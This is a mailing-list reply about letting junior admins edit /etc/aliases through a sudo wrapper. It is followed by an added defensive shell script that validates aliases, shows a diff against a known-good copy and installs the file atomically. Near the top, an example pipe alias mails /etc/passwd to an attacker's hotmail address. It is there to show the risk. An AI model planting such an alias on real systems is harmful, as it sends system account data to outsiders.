
Re: VI wrapper for SUDO? - aliases

hi joshua...

/etc/aliases... what can we do with it...

I don't know if this was Bill's original intent or not,

but let's see what (regular) people can do with /etc/aliases

/etc/aliases
	# a pipe alias: the MTA runs the command with the message on stdin
	badthing:	"|mail -s 'send me the passwd' hacker@hotmail.com < /etc/passwd"

but since the persons allowed to edit the /etc/aliases file are internal
anyway .. I don't think we have to worry about that kind of stuff

if the company has 500 people, with people leaving and coming onboard,
and if there are jr admins... let them add/delete the people
from "all" or "sales" or "engineering" or "managers" etc...
	- in this case .. the sudo wrapper/editor script is good

	and the script can also propagate the /etc/aliases file to
	each machine that needs to have the aliases file kept current

	root@Slaves # sucpaliases -scp
		where it does ( and only if it's out-of-date )
		" scp MasterCopy:/etc/aliases /etc ; newaliases "

the wrapper script can also do the diff and/or run newaliases
depending on your level of paranoia about the ones allowed to run
this "sudo alias script"
	- nothing happens till *you* run newaliases... which I would
	do myself if I was responsible... but I'd do a diff between
	the new one and the previously tested/good version

have fun linuxing
alvin


On Fri, 30 Nov 2001, Joshua Goodall wrote:

> That is a fair point but addressable with post-editing checks
> in the wrapper. Of course, one is exceedingly vulnerable to
> race conditions if one is not very careful about what is read and
> when.
> 
> You don't have to use vi; there are dumber editors in the world.
> 
> Maybe you should just have some programmatic (i.e. commandline,
> not full-screen) editing program for aliases that's callable from sudo.
> 
> However the whole idea fills me with worry; /etc/aliases IS quite a critical
> file and I'm certain that specific attacks could be engineered
> against you if write access was obtained.
> 
> Why not just have users make their changes and mail a diff to
> the sysadmin for approval :)
> 
> J
> 
> p.s. failing that, investigate LIDS; but that's a different ball game.
> 

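As an added example (not code from this thread, nor from any project the thread mentions), here is a sketch of the "programmatic editing program callable from sudo" with post-editing checks that Joshua suggests, combined with the diff-then-newaliases wrapper Alvin describes. The script name aliases-install, the known-good path /etc/aliases.good, the sudoers line, and the GOOD/DEST/NEWALIASES variables are assumptions. The idea is that the junior admin edits a copy of the file as themselves, and only the install step runs under sudo: it copies the submitted file to a root-owned temp file before validating it, so the caller cannot swap the contents between the check and the install (the race Joshua warns about), refuses any alias whose value is not a plain address list (so a pipe alias like the badthing one above cannot get in this way), shows the diff against the last known-good copy, and installs with an atomic rename before running newaliases.

```shell
#!/bin/sh
# aliases-install: hypothetical sudo-callable installer for /etc/aliases
# (added example, not from the thread).  Assumed paths/variables:
#   GOOD        last known-good copy        (default /etc/aliases.good)
#   DEST        the live aliases file       (default /etc/aliases)
#   NEWALIASES  command that rebuilds the db (default newaliases)
set -eu

GOOD=${GOOD:-/etc/aliases.good}
DEST=${DEST:-/etc/aliases}
NEWALIASES=${NEWALIASES:-newaliases}

# Fold sendmail-style continuation lines (leading whitespace) onto the
# line before them and drop comments and blanks, so each alias is one line.
fold_aliases() {
    awk '/^[ \t]/ { cur = cur " " $0; next }
         { if (cur != "") print cur; cur = $0 }
         END { if (cur != "") print cur }' "$1" \
      | grep -v '^#' | grep -v '^[[:space:]]*$' || true
}

# Accept only "name: addr, addr, ..." where each addr is a local user or
# user@host.  Pipes ("|cmd"), file deliveries (/path) and :include: lists
# are refused: any of them lets whoever edits the file run commands or
# read files as the MTA's user.
validate_aliases() {
    va_addr='[A-Za-z0-9._+-]+(@[A-Za-z0-9.-]+)?'
    va_ok="^[A-Za-z0-9._+-]+:[[:space:]]*$va_addr([[:space:]]*,[[:space:]]*$va_addr)*[[:space:]]*\$"
    va_bad=$(fold_aliases "$1" | grep -Ev "$va_ok" || true)
    if [ -n "$va_bad" ]; then
        printf 'rejected alias line(s):\n%s\n' "$va_bad" >&2
        return 1
    fi
    return 0
}

# Copy first, validate the copy, then install atomically.  Validating the
# caller's own file and installing it afterwards would leave a window in
# which the caller rewrites it between the check and the install.
install_aliases() {
    if [ -L "$1" ] || [ ! -f "$1" ]; then
        echo "refusing $1: not a regular file" >&2
        return 1
    fi
    ia_tmp=$(mktemp "$DEST.XXXXXX")      # root-owned, mode 600
    cp "$1" "$ia_tmp"
    if ! validate_aliases "$ia_tmp"; then
        rm -f "$ia_tmp"
        return 1
    fi
    echo "--- changes against $GOOD ---"
    diff -u "$GOOD" "$ia_tmp" || true    # diff exits 1 when the files differ
    chmod 644 "$ia_tmp"
    mv "$ia_tmp" "$DEST"                 # rename(2): never a half-written file
    cp "$DEST" "$GOOD"                   # the installed copy becomes the new known-good one
    "$NEWALIASES"
}

# sudoers line (assumed):  jradmin ALL = (root) /usr/local/sbin/aliases-install
# usage:  sudo aliases-install ~/aliases.new
if [ "$#" -eq 1 ]; then
    install_aliases "$1"
fi
```

The validator is deliberately strict: anything that is not a bare name or user@host on the right-hand side is rejected, which also rules out quoted values, so if the site legitimately uses :include: lists or program aliases they have to be installed by a full admin outside this wrapper.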